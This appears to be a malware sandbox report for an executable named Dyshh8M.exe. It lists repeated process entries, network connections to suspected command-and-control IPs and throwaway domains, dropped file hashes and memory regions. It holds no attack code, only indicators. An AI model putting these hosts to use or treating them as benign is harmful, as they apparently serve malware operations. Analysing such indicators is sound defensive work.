C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 8.8.8.8:53 embarkiffe.shop udp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 calmingtefxtures.run udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 172.67.158.171:443 calmingtefxtures.run tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.96.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 104.21.74.230:443 tracnquilforest.life tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 presentymusse.world udp
NL 172.217.23.196:443 www.google.com tcp
US 8.8.8.8:53 boltetuurked.digital udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
NL 172.217.168.234:443 ogads-pa.googleapis.com tcp
NL 172.217.168.206:443 apis.google.com tcp
NL 172.217.168.234:443 ogads-pa.googleapis.com udp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.39.110:443 play.google.com tcp
NL 142.251.39.110:443 play.google.com udp
N/A 224.0.0.251:5353 udp
NL 142.251.39.110:443 play.google.com tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.80.1:443 exarthynature.run tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 104.21.80.1:443 exarthynature.run tcp
US 104.21.80.1:443 exarthynature.run tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
DE 159.69.100.232:443 159.69.100.232 tcp
DE 159.69.100.232:443 159.69.100.232 tcp
US 104.21.81.29:443 disobilittyhell.live tcp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 92.123.241.137:80 www.microsoft.com tcp
US 8.8.8.8:53 paleboreei.biz udp
US 104.21.83.210:443 paleboreei.biz tcp
US 8.8.8.8:53 bbcnas2.zapto.org udp
US 195.177.94.176:8041 bbcnas2.zapto.org tcp
US 104.21.96.1:443 exarthynature.run tcp
US 104.21.74.230:443 tracnquilforest.life tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 104.21.81.29:443 disobilittyhell.live tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.81.29:443 disobilittyhell.live tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
DE 104.194.157.122:80 104.194.157.122 tcp

Files

memory/2180-4-0x000007FEF60EE000-0x000007FEF60EF000-memory.dmp

memory/2180-5-0x000000001B670000-0x000000001B952000-memory.dmp

memory/2180-6-0x0000000002860000-0x0000000002868000-memory.dmp

memory/2180-7-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp

memory/2180-8-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp

memory/2180-9-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp

memory/2180-11-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp

memory/2180-10-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp

memory/2180-12-0x000007FEF5E30000-0x000007FEF67CD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c511e639eac1be2348dc95e92d64c01f
SHA1 7e56a225c082c690a1dff7b8cbdbf7e595ed56ef
SHA256 a2280df60a89ab1a3708a174b026c68cc222392e2a5ef5157fa472797cbff2a1
SHA512 5fa6131de429fa2838583f1ab2901cabc46eb33b020263a92a636d49a714c0f62c371041ada4c209674c97dd830bd3c92f6d5887c5a4c87817ac01879ff44fa0

memory/2752-19-0x000000001B520000-0x000000001B802000-memory.dmp

memory/2752-20-0x0000000002690000-0x0000000002698000-memory.dmp

C:\Temp\BaWQvGOZI.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 a92d6465d69430b38cbc16bf1c6a7210
SHA1 421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
SHA512 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

C:\Users\Admin\AppData\Local\Temp\10000300101\q3na5Mc.exe

MD5 4871c39a4a7c16a4547820b8c749a32c
SHA1 09728bba8d55355e9434305941e14403a8e1ca63
SHA256 8aa3e2705e32e8175242fcf19391ab909037111f19cf5f9953885c911f440453
SHA512 32fa81a1501b727cda79d25159e60ee5c627a8f4db6cbcc741b022d3d6e45c43eeb4fbcd8c8043f71bc23a4a326f66553314384c39c97aaf58b6385d9aac26ec

memory/776-61-0x0000000000290000-0x00000000002BC000-memory.dmp

memory/1968-68-0x0000000000400000-0x0000000000429000-memory.dmp

